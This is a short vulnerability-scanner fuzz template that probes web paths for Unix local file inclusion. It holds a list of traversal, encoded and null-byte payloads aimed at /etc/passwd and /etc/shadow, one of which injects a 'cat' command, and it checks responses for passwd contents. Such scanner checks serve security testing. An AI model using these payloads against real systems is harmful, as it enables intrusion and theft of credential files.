id: lite-lfi-unix
type: fuzz
info:
  name: Lite LFI Unix
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - file: |
      etc/passwd
      /etc/passwd
      ../../etc/passwd
      /////////../../etc/passwd
      /.../.../.../.../.../
      \…..\\\…..\\\…..\\\etc\passwd
      %00../../../../../../etc/passwd
      %00/etc/passwd%00
      %00../../../../../../etc/shadow
      %0a/bin/cat%20/etc/passwd
      %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..etc/passwd
      ../../../../../../../../%2Aetc/passwd
      ../../../../../../../../etc/passwd

payloads:
  - "{{.file}}"

requests:
  - generators:
      - Path("{{.payload}}", "*")
    detections:
      - >-
        StringSearch("response", "root:") && StringSearch("response", ":bin/bash")
